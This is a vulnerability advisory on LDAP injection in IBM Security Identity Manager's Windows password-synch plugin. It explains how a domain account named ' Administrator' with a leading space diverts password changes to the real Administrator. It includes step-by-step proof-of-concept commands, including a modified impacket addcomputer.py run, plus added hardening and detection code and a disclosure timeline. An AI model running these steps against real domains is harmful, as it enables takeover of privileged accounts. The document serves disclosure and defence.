LDAP Injection leading to account takeover
IBM Security Identity Manager Windows Password Synch Plug-in
Krzysztof Andrusiak and Marcin Ogorzelski
The vulnerability allows an attacker to modify the LDAP query sent by the plugin by using a specially crafted account name, possibly leading to account takeover.
In order to exploit this vulnerability, an attacker must have access to a domain account with privileges to either modify account names or join computers to the domain (by default, every domain user can join up to 10 machines to the domain).
An example LDAP query sent by the plugin during an "Administrator" account password change is presented below:
If a new account (either a user or a machine account) with the name " Administrator" (with a leading space) were created in the domain, then the following LDAP request would be sent:
Since leading whitespace characters are ignored, the "Administrator" user account (without the leading space) would be returned as the search result. The ISIM plugin would then send the password change request to the ISIM server for the "eruid= Administrator" user.
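The following is an added example written for this write-up; it is not code from the plugin or from IBM. It simulates the lenient directory matching described above (leading whitespace ignored, case-insensitive) with a constructed in-memory directory, and shows the two checks a password-synch component can apply so that " Administrator" never resolves to the real Administrator entry: an allowlist on the requested name before the query, and a byte-exact comparison of the returned sAMAccountName against the requested name after it. The allowlist pattern, the sample entries and the function names are assumptions made for the example; escape_filter_value follows RFC 4515.

```python
"""Hardened account lookup (added example, not the plugin's code)."""
import re

# Constructed sample directory: sAMAccountName -> DN. Not real data.
DIRECTORY = {
    "Administrator": "CN=Administrator,CN=Users,DC=domain,DC=local",
    "jsmith": "CN=John Smith,CN=Users,DC=domain,DC=local",
}

# Assumed conservative allowlist: no whitespace, no leading punctuation.
CANONICAL_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,19}$")


class UnsafeAccountName(ValueError):
    """Raised when a requested name fails either hardening check."""


def ldap_normalize(value: str) -> str:
    """Approximation of the lenient matching rule the advisory describes:
    case-fold, trim, and collapse runs of whitespace."""
    return " ".join(value.split()).lower()


def directory_search(name: str) -> list:
    """Stand-in for the LDAP search. Returns every entry whose
    sAMAccountName matches under the lenient rule, i.e. exactly the
    entries the directory would hand back to the plugin."""
    key = ldap_normalize(name)
    return [(sam, dn) for sam, dn in DIRECTORY.items() if ldap_normalize(sam) == key]


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for a value embedded in a search filter."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def build_filter(name: str) -> str:
    """Filter string the lookup would send (escaping only; escaping alone
    does not stop the whitespace trick, hence the checks below)."""
    return "(&(objectClass=user)(sAMAccountName=%s))" % escape_filter_value(name)


def validate_name(name: str) -> bool:
    """Check 1: reject names that are not in canonical form up front."""
    return CANONICAL_NAME.match(name) is not None


def resolve_account(name: str) -> str:
    """Return the DN for *name* only if both checks pass."""
    if not validate_name(name):
        raise UnsafeAccountName("account name is not canonical: %r" % name)
    results = directory_search(name)
    # Check 2: the entry the directory returned must carry exactly the
    # requested name. A whitespace or case variant is a different account.
    exact = [dn for sam, dn in results if sam == name]
    if len(exact) != 1:
        raise UnsafeAccountName(
            "no exact match for %r (directory returned %d entries)" % (name, len(results)))
    return exact[0]


if __name__ == "__main__":
    print(build_filter("Administrator"))
    print("lenient search for ' Administrator':", directory_search(" Administrator"))
    print("resolve 'Administrator':", resolve_account("Administrator"))
    try:
        resolve_account(" Administrator")
    except UnsafeAccountName as exc:
        print("rejected:", exc)
```

Check 2 is the one that matters even if an allowlist cannot be enforced (for example when the directory legitimately contains names outside the pattern): whatever the search returns, the password change is only forwarded for an entry whose name is identical to the one requested.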
The PoC was tested in the following environment:
- Domain Controller: Windows Server 2019 (with default configuration and ISIM plugin)
- Client machine: Windows 10 (with Python 3.9.2)
Steps to reproduce:
- Install the impacket module using the following command:
python -m pip install impacket
- Copy the "addcomputer.py" script (from the "<Python install dir>\Scripts" folder) to another directory. The script can also be downloaded from https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py.
- Remove or comment out the following part of the copied script, so that the script allows creating machine accounts without a trailing '$' symbol:
else:
    if self.__computerName[-1] != '$':
        self.__computerName += '$'
- Open PowerShell and change to the modified script's directory.
- Execute the following command to add a new machine account named " Administrator" (with a leading space). Replace "DOMAIN.LOCAL/account" with a user that has privileges to join computers to the domain (by default, every domain user can join up to 10 machines).
python addcomputer.py -computer-name " Administrator" -computer-pass "Password1!" DOMAIN.LOCAL/account
When prompted, enter the password for the chosen domain account ("DOMAIN.LOCAL/account").
- After the machine account is added, the following HTTPS request will be sent by the plugin to the ISIM server:
<?xml version="1.0" encoding="UTF-8"?><PSWD_REQ_MSG><CREDENTIALS principal="test" pswd="test"/><REQUEST op="synch" srcDN="erservicename=testservice,o=testorg" userDN="erUid= Administrator" pswd="Password1!"/></PSWD_REQ_MSG>
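The following is an added detection example for this write-up; it is not part of the plugin or of IBM's advisory. It parses PSWD_REQ_MSG messages of the shape shown above (as they would appear in a request log or a proxy capture) and flags any userDN whose erUid value is not in canonical form or collapses, after whitespace trimming and case folding, to a privileged account name. The two sample messages are constructed; the second mirrors the request from the PoC with the password replaced by a placeholder. The privileged-name set and the function names are assumptions made for the example.

```python
"""Flag synch requests carrying non-canonical user names (added example)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample messages, not captured traffic.
SAMPLE_MESSAGES = [
    '<?xml version="1.0" encoding="UTF-8"?><PSWD_REQ_MSG>'
    '<CREDENTIALS principal="test" pswd="test"/>'
    '<REQUEST op="synch" srcDN="erservicename=testservice,o=testorg" '
    'userDN="erUid=jsmith" pswd="REDACTED"/></PSWD_REQ_MSG>',
    '<?xml version="1.0" encoding="UTF-8"?><PSWD_REQ_MSG>'
    '<CREDENTIALS principal="test" pswd="test"/>'
    '<REQUEST op="synch" srcDN="erservicename=testservice,o=testorg" '
    'userDN="erUid= Administrator" pswd="REDACTED"/></PSWD_REQ_MSG>',
]

# Assumed set of names that deserve an alert when spelled non-canonically.
PRIVILEGED = {"administrator", "krbtgt"}


def extract_uid(message: str) -> str:
    """Return the raw erUid value from the REQUEST element's userDN.
    XML attribute normalization keeps leading spaces, so the value is
    seen exactly as the plugin sent it."""
    root = ET.fromstring(message.encode("utf-8"))
    request = root.find("REQUEST")
    if request is None:
        raise ValueError("message has no REQUEST element")
    user_dn = request.get("userDN", "")
    attr, sep, value = user_dn.partition("=")
    if not sep or attr.strip().lower() != "eruid":
        raise ValueError("unexpected userDN: %r" % user_dn)
    return value


def classify(uid: str) -> list:
    """Return a list of findings for one erUid value (empty = clean)."""
    findings = []
    if uid != uid.strip():
        findings.append("leading/trailing whitespace")
    if re.search(r"\s", uid.strip()):
        findings.append("embedded whitespace")
    normalized = " ".join(uid.split()).lower()
    # Only a non-canonical spelling is suspicious; a plain "Administrator"
    # password change is ordinary traffic.
    if normalized in PRIVILEGED and normalized != uid.lower():
        findings.append("non-canonical spelling of privileged account")
    return findings


def scan(messages) -> list:
    """Run classify() over every message; return (index, uid, findings)
    for the ones that produced at least one finding."""
    alerts = []
    for idx, msg in enumerate(messages):
        uid = extract_uid(msg)
        findings = classify(uid)
        if findings:
            alerts.append((idx, uid, findings))
    return alerts


if __name__ == "__main__":
    for idx, uid, findings in scan(SAMPLE_MESSAGES):
        print("message %d: userDN value %r -> %s" % (idx, uid, ", ".join(findings)))
```

The same classify() logic can be pointed at a dump of sAMAccountName values from the domain instead of at request messages, which surfaces the crafted machine or user account at creation time rather than at the moment a password change is forwarded.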
Timeline:
- 10-03-2021 - Vulnerability reported to vendor
- 22-03-2021 - First response from vendor
- 02-04-2021 - Vulnerability acknowledged by vendor
- 29-06-2021 - Advisory published by IBM
- 15-07-2021 - Public disclosure
- 23-08-2021 - PoC release